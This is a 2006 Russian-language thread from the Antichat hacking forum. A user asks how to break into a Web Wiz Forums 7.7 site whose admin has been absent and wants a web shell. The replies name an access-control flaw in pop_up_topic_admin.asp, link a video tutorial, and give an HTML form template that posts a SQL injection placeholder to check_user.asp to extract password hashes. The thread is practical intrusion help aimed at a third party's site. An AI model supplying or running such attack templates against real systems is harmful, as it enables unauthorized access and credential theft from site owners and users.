HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Есть ли уязвимости в Web Wiz Forums version 7.7
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Есть ли уязвимости в Web Wiz Forums version 7.7
  #1  
Старый 11.07.2006, 06:00
banall
Познающий
Регистрация: 25.06.2006
Сообщений: 55
С нами: 10462265

Репутация: 0
По умолчанию Есть ли уязвимости в Web Wiz Forums version 7.7
В этой версии форума
Powered by Web Wiz Forums version 7.7
в первый раз сталкиваюсь с данным форумом, может кто подскажет как ломануть, только не XSS админ не появлялся 1.5 года.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 11.07.2006, 09:14
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
С нами: 10531106

Репутация: 354


По умолчанию
Да есть!!:-)
В них есть SQL инъекция потому что сценарий pop_up_topic_admin.asp не проверяет разрешения доступа при обновлении параметров темы.
Поэтому удаленный атакующий может неавторизованно выполнять административные операции над темой форума.
 
Ответить с цитированием

  #3  
Старый 11.07.2006, 09:49
banall
Познающий
Регистрация: 25.06.2006
Сообщений: 55
С нами: 10462265

Репутация: 0
По умолчанию
Цитата:
Сообщение от dracula4ever  
Да есть!!:-)
удаленный атакующий может неавторизованно выполнять административные операции над темой форума.
И все, а как на счет веб шелла, через скуль инекцию никак?
 
Ответить с цитированием

  #4  
Старый 11.07.2006, 10:01
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
С нами: 10531106

Репутация: 354


По умолчанию
Бляяяя....
Вот тебе линк на видео урок.
http://video.antichat.org/file134.html
 
Ответить с цитированием

  #5  
Старый 11.07.2006, 11:06
banall
Познающий
Регистрация: 25.06.2006
Сообщений: 55
С нами: 10462265

Репутация: 0
По умолчанию
Цитата:
Сообщение от dracula4ever  
Бляяяя....
Вот тебе линк на видео урок.
http://video.antichat.org/file134.html
а толку то, ведь админы уже больше года не появляются.
 
Ответить с цитированием

  #6  
Старый 14.07.2006, 19:05
j0nathan
Познающий
Регистрация: 13.07.2006
Сообщений: 65
С нами: 10436457

Репутация: 11
По умолчанию
не хочешь иксСС на скуль

Код:
<html>
< form method="POST" action="http://target/[product]/check_user.asp">
< input type="hidden" name="txtUserName" value="[SQL INJECTION]">
< input type="hidden" name="txtUserPass" value="1">
< input type="submit" value="Submit" name="submit">
< /form></html>
Сиди вытигивай хэш из БД !! Удачи
 
Ответить с цитированием

  #7  
Старый 16.07.2006, 03:18
banall
Познающий
Регистрация: 25.06.2006
Сообщений: 55
С нами: 10462265

Репутация: 0
По умолчанию
спасибо большое!!!!
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какие уязвимости есть в IPB v1.1.2? Inferno Уязвимости CMS / форумов 2 26.06.2007 22:23
Web Wiz Guestbook }{0TT@БЬ)Ч Уязвимости 4 27.04.2006 13:31
Действующие уязвимости почтовых систем РФ Maxmen Уязвимости Mail-сервис 16 12.12.2004 16:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.